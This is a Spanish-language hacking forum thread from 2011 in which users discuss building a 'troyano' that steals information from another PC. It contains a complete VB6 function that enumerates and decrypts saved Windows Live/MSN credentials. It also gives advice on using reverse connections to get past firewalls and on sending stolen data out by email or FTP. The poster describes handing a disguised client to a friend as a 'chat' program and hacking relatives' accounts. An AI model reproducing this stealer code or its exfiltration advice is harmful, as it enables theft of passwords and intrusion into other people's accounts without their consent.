elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Conectar a otra pc
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Conectar a otra pc  (Leído 3,563 veces)
CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Conectar a otra pc
« en: 23 Abril 2011, 18:40 pm »

hola!

hace tiempo habia creado un 'troyano', nose como decirle. la cosa es q entraba, obtenia informacion, me la mandaba y se eliminaba.

lo de eliminarse es lo de menos, pero tengo el proyecto en mi disco duro usb usb, el cual perdi el cable, y no me acuerdo ni la base...

se que en internet esta LLENO de info sobre esto, pero siempre resulto con dudas

eso no significa que no este buscando, claro que busco! y si lo soluciono, aviso y pongo la solucion; para eso son los foros ♥

s2


En línea

Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: Conectar a otra pc
« Respuesta #1 en: 23 Abril 2011, 20:43 pm »

Lee sobre Sockets para conectar cliente-servidor y acordate q el server se tendra q conectar al cliente, para q sea inversa la conexion y te saques el problema del firewall ya q sos vs el q tendra q abrir los puertos no la otra pc.

Primero aprende a crear un simple Chat y desp ya entenderas como es la cosa vas a ver q es facil, ya q lo dificil es tener todas esas opciones q tienen los troyanos, pero un troyano simple podes hacer sin problemas


En línea

CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Conectar a otra pc
« Respuesta #2 en: 23 Abril 2011, 21:28 pm »

ok, ya empiezo a recordar....

aclaro que no quiero hacer ni troyanos ni nada de eso, sino algo que me sirva cuando lo necesite.

s2
En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Conectar a otra pc
« Respuesta #3 en: 23 Abril 2011, 22:44 pm »

el pibe tenia un stealer.
Busca mandar emails y subir a ftps.
Capas que por ahi vas mas facil.
En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Conectar a otra pc
« Respuesta #4 en: 23 Abril 2011, 22:51 pm »

recien termine un server y un cliente

el cliente abria invisible y el server recibia todas las contraseñas guardadas

a la hora de compilar, me tilda el vb

lo hice todo devuuelta

le pase el cliente a un amigo diciendo q era un chat

resulta q le falta una dll (no el ocx de wsock), asi que ni inicia

Si quieren seguir aportando al tema, esta bien, para eso esta, pero el dueño capaz lo agarre otro dia ^^ (Digo esto porque despues cuando abren otro tema se quejan que siempre lo mismo xd)
En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Conectar a otra pc
« Respuesta #5 en: 23 Abril 2011, 22:58 pm »

para eso nukje manda emails o subi a un ftp, va a ser mas facil.

Ahora, si queres usar winsocks sin el ocx existe un wsock que usa las apis.
Busca seguro sale porque es muy conocido.

PD: Como averiguas las contraseñas, contraseñas de que? para que? (Robar es malo  :xD)
En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Conectar a otra pc
« Respuesta #6 en: 23 Abril 2011, 23:05 pm »

para eso nukje manda emails o subi a un ftp, va a ser mas facil.

Ahora, si queres usar winsocks sin el ocx existe un wsock que usa las apis.
Busca seguro sale porque es muy conocido.

PD: Como averiguas las contraseñas, contraseñas de que? para que? (Robar es malo  :xD)

ajja , tenes razon, voy a ver eso de ftp.... o emails

para robar contraseñas de msn,

Código
  1. 'codigo de karcrack - elhacker.net
  2. Option Explicit
  3.  
  4. 'KERNEL32
  5. Private Declare Function GetProcessHeap Lib "KERNEL32" () As Long
  6. 'ADVAPI32
  7. Private Declare Function CredEnumerateW Lib "ADVAPI32" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
  8. 'CRYPT32
  9. Private Declare Function CryptUnprotectData Lib "CRYPT32" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As Long) As Long
  10. 'NTDLL
  11. Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal ProcessHandle As Long, ByVal BaseAddress As Long, ByVal pBuffer As Long, ByVal NumberOfBytesToWrite As Long, ByRef NumberOfBytesWritten As Long) As Long
  12. Private Declare Function RtlFreeHeap Lib "NTDLL" (ByVal HeapHandle As Long, ByVal Flags As Long, ByVal MemoryPointer As Long) As Long
  13.  
  14. Private Type DATA_BLOB
  15.    cbData                  As Long
  16.    pbData                  As Long
  17. End Type
  18.  
  19. Private Type ACCOUNT_INFO
  20.    sMail                   As String
  21.    sPassword               As String
  22.  
  23. End Type
  24.  
  25. Private Function sMSN() As ACCOUNT_INFO()
  26.    Dim tTMP()      As ACCOUNT_INFO
  27.    Dim i           As Long
  28.    Dim x           As Long
  29.    Dim lCount      As Long
  30.    Dim lCred       As Long
  31.    Dim lPtr        As Long
  32.    Dim lUser       As Long
  33.    Dim tBlobIn     As DATA_BLOB
  34.    Dim bvGUID(4)   As Currency
  35.  
  36.    bvGUID(0) = 2814797012434.9527@
  37.    bvGUID(1) = 2139259215904.7791@
  38.    bvGUID(2) = 1632598244864.8297@
  39.    bvGUID(3) = 2842944080556.8622@
  40.    bvGUID(4) = 275.2573@
  41.    'bvGUID = "WindowsLive:name=*"
  42.  
  43.    Call CredEnumerateW(VarPtr(bvGUID(0)), 0, lCount, lCred)
  44.  
  45.    For i = 0 To lCount - 1
  46.        Call NtWriteVirtualMemory(-1, ByVal VarPtr(lPtr), ByVal lCred + (i * &H4), &H4, 0)
  47.        Call NtWriteVirtualMemory(-1, ByVal VarPtr(lUser), ByVal (lPtr + &H30), &H4, 0)
  48.        Call NtWriteVirtualMemory(-1, ByVal VarPtr(tBlobIn.cbData), ByVal (lPtr + &H18), &H8, 0)
  49.  
  50.        Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, 0&)
  51.  
  52.        If tBlobIn.cbData Then
  53.            ReDim Preserve tTMP(x)
  54.            With tTMP(x)
  55.                .sPassword = Space$(tBlobIn.cbData \ 2)
  56.                Call NtWriteVirtualMemory(-1, ByVal StrPtr(.sPassword), ByVal tBlobIn.pbData, tBlobIn.cbData, 0)
  57.                If Len(.sPassword) > 0 Then
  58.                    .sMail = uReadStr(lUser)
  59.                End If
  60.            End With
  61.            x = x + 1
  62.        End If
  63.    Next i
  64.  
  65.    Call RtlFreeHeap(GetProcessHeap(), 0, lCred)
  66.  
  67.    sMSN = tTMP
  68. End Function
  69.  
  70. Private Function uReadStr(ByVal lPtr As Long) As String
  71.    Dim iChar       As Integer
  72.    Dim i           As Long
  73.  
  74.    Do
  75.        Call NtWriteVirtualMemory(-1, ByVal VarPtr(iChar), ByVal (lPtr + i * 2), 2, ByVal 0&)
  76.        i = i + 1
  77.        If iChar = 0 Then Exit Do
  78.        uReadStr = uReadStr & ChrW$(iChar)
  79.    Loop
  80. End Function
  81.  
  82. Private Sub Command1_Click()
  83.    Dim i   As Long
  84.    Dim x() As ACCOUNT_INFO
  85.  
  86.    x = sMSN
  87.  
  88.    For i = LBound(x) To UBound(x)
  89.        MsgBox x(i).sMail & " - " & x(i).sPassword
  90.    Next i
  91.  
  92. End Sub

mas muestra en un msgbox ;

p.d: tube que hackear los msn de unos familiares (los del otro equipo JAJAJ), paraobtener unos datos.... alfinal los hackie sin este "stealer" ; aunque fue algo very lammer. JAJAAJJAJ.

como no encontre lo que necesitaba en esos msn (vease mi post en hacking avanzado), devolvi sus respectivas passwords.
« Última modificación: 24 Abril 2011, 09:57 am por nuKje » En línea

Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
Re: Conectar a otra pc
« Respuesta #7 en: 24 Abril 2011, 02:42 am »

juraria que esa funcion es de karcrack y es la misma funcion que usa mi Elemental MSN Stealer 2.0  :¬¬
En línea

I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Conectar a otra pc
« Respuesta #8 en: 24 Abril 2011, 09:44 am »

nose, la tengo guardada hace muuuuuuuuuuuuuuuuuuuuuuuuuucho (pero aclaro que mia no es, y nunca dije que es mia)
ahora edito y le pongo los creditos, no sabia que era de el  ;)

« Última modificación: 24 Abril 2011, 12:22 pm por nuKje » En línea

CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Conectar a otra pc
« Respuesta #9 en: 24 Abril 2011, 13:35 pm »

Ahora estoy con otra, :p

estoy subiendo el archivo desde un bat, (me esta liando... y eso que es facil!)

http://foro.elhacker.net/scripting/batch_ftp_error-t325543.0.html;msg1606466

pro: todas, cuando lo solucione :p

contra: firewall..................

Ahora voy a ver que es lo que realmente me combiene, si luchar con el firewall (? , o desde vb6.

s2
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Conectar PPC WM5.0 con otra PPC WM2003
Hacking Mobile
[.:: NauJFracT ::.] 0 2,997 Último mensaje 23 Septiembre 2006, 09:42 am
por [.:: NauJFracT ::.]
Conectar router a otra red
Materiales y equipos
oo00oo 3 2,652 Último mensaje 2 Abril 2008, 05:38 am
por survil
Conectar internet de una pc a otra
Redes
MARU74 2 2,828 Último mensaje 1 Agosto 2010, 21:33 pm
por JW2
Conectar con PC de otra red
Redes
XafiloX 5 8,704 Último mensaje 10 Abril 2011, 23:30 pm
por zerocoolcom
Conectar con otra pc
Redes
Theibxmc 1 1,896 Último mensaje 28 Abril 2012, 22:31 pm
por beholdthe
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines